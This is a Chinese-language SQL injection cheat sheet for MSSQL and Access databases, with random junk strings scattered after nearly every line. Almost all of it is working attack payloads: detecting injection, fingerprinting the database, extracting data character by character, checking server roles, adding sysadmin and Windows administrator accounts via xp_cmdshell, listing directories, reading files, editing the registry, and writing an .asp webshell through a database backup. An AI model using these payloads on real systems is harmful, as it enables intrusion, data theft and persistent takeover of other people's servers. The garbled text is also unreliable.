1.判断是否有注入;and 1=1 ;and 1=2 }Ecv6&G
2.初步判断是否是mssql ;and user>0 pZS]i
"
^|Z'}p|&
3.注入参数是字符'and [查询条件] and ''=' a&JY x
3}\ z&|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /g>-s&w
y%vAEQ2j=
5.判断数据库系统 q`p0ul,n
)]q Qgc&
;and (select count(*) from sysobjects)>0 mssql @@*x/"GJG
`WH$rx!
;and (select count(*) from msysobjects)>0 access n`Z}tQ%)o
ied1+H
>g !Z|ju
H_f8/H
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ?S&
yF
z&H.fs L
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 % WDTnEm
.iR<5.
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 j>8ubA
*e [*
9.(1)猜字段的ascii值(access) (km
$qX
@cIYS%iZ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 NB<8M!X/
?<4pYEP
(2)猜字段的ascii值(mssql) b * \
oQ
U<&=pv
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ]a/dvj}
4RDY_HgF6
10.测试权限结构(mssql) *-=/"m
&Y1h=,KR9
f4pIF"U9>
%pjY ^tM/
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- @,oc%m
3q`f|r
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- MD$W;rk(Hn
mRAt5a#is
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- sT1k]duT
;R0LJApey
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- B ZU@W%E
+)yoQRekX
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- [nHN@p|
v\bWQs1
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- axmq/8X
[?N,3
;and 1=(select IS_MEMBER('db_owner'));-- 8!35
K
j)8$hK/e0.
+mBS&FK
to).PI?
11.添加mssql和系统的帐户 r&xIVFPI[
H2|'JA#v
;exec master.dbo.sp_addlogin username;-- x7e0&
;exec master.dbo.sp_password null,username,password;-- .*6NqX$
'eBD/w5U
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ~roNe|P
e=h-}XRC
;exec master.dbo.xp_cmdshell 'net user username password 5D<Zbn.>q
-cU bIbW
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- +fY@q,`
Kh4rl)L*+%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- #@-dT,t
;Egl8Vhr
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 6I(Y<LZ5
KW'nW
,5<AV K-#Q
`vzMuL;
12.(1)遍历目录 x(sKkm`Q
!otseI!!/
;create table dirs(paths varchar(100), id int) >a*dI_XE
M*n94L=Sg&
;insert dirs exec master.dbo.xp_dirtree 'c:\' oMAUR
"
6@lZVM)E
;and (select top 1 paths from dirs)>0 GKEOjaE
z l`m1k-X
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ,#BD/dF
sKW~+]
T]Q4=xsv
tkm@&e=e%
(2)遍历目录 shdzkET8N
WYRC_U7
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- QsKnaRT
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 {~]5QKg.
FT>>XP8
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 3d;J"e+?
-wH0g^Ed
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 R#Yj%$E1
61QA<Wb
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 A#']e 8
7)}_'p
j*gZvbO;'L
%I`'it2d
13.mssql中的存储过程 m["e7>9G
;uc3_J]
xp_regenumvalues 注册表根键, 子键 @$kzes\
a5m[
N'kah
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ?{ \7th37
id+EBVHAd
xp_regread 根键,子键,键值名 :I/9j=@1
\kKd:C{
;exec xp_regread wbr$w>n
3%Q<K=jy
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6&<QjO
Ok)f5")N %
xp_regwrite 根键,子键, 值名, 值类型, 值 z@ZI$.w
J"h2"$v,
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 7gOu|t
pk'd&.
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 uj\&-9gEi
IC"ktv bHz
xp_regdeletevalue 根键,子键,值名 2h<_?GM\s
Iw?f1]
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 A>Qu`%g*
v1+.-hO
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 h8M_Uk
9
4bDJy1
"fv+}'
mHW%^R=
14.mssql的backup创建webshell x]hG2on!
0n4( Rj|}2
use model qmPu D/c
)gU:Up24|"
create table cmd(str image);
)bYOy+2g
_qOynW
insert into cmd(str) values (''); H/ e jO_{
}jce5E
backup database model to disk='c:\l.asp'; ^wSGrV'
-/B*\X[
&)Zv>P8z`
6^jrv [d
15.mssql内置函数 ;D-k\kv
Omn$O>
;and (select @@version)>0 获得Windows的版本号 ~#so4<A`3
#~m^RoE
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Exv!!0Cd^
iu{;|E
;and (select user_name())>0 爆当前系统的连接用户 VR_/Vh]@
i&m6;>?`
;and (select db_name())>0 得到当前连接的数据库 !.iFU+?V
#68$'Rl"o1
bM_fuy55Op
@@R&OR
16.简洁的webshell &\5bo=5V
ettBque
use model vd^Z^cpip
XgUSJ*
create table cmd(str image); {Z!t:'x8
1)~9Eku6K
insert into cmd(str) values (''); .MDSP/s
.*595SuF
backup database model to disk='g:\wwwtest\l.asp';